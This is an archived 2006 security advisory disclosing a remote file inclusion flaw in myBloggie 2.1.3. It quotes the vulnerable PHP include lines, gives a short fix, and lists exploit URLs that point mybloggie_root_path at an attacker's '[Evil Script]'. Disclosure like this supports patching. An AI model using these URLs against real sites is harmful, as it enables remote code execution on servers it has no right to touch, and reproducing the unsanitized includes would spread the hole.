Lucene search
SecurityvulnsSECURITYVULNS:DOC:13860HistoryAug 11, 2006 - 12:00 a.m.
myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability
2006-08-1100:00:00
vulners.com
13
myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion
Author : Sh3ll
Date : 2006/04/29
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
Affected Software Description:
Application : myBloggie
version : 2.1.3
URL : http://www.mywebland.com , http://mybloggie.mywebland.com
Description :
myBloggie is considered one of the most simple, user-friendliest yet packed
with features Weblog system available to date.
------------------------------------------------------------------------
-----------------
Vulnerabilities:
~~~~~~~~~~~~~~~
in admin.php , index.php & db.php We Found Vulnerability Scripts
----------------------------------------admin.php-----------------------
-----------------
....
<?php
include($mybloggie_root_path.'spacer6.php');
?>
...
----------------------------------------index.php-----------------------
-----------------
....
<?php
}
if (!isset($mode)) {
include($mybloggie_root_path.'blog.php');
}
$template->pparse('sidevert');
}
// End right sidemenu condition
// Sidemenu menu items. You can change the menu item order here
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
include($mybloggie_root_path.'searchform.php');
include($mybloggie_root_path.'spacer.php');
}
...
-------------------------------------------db.php-----------------------
-----------------
....
<?php
include($mybloggie_root_path .'includes/mysql.php');
?>
...
------------------------------------------------------------------------
-----------------
Exploit:
~~~~~~~
http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[E
vil Script]
Solution:
~~~~~~~~
Sanitize Variabel $mybloggie_root_path in admin.php , index.php & db.php
------------------------------------------------------------------------
-----------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams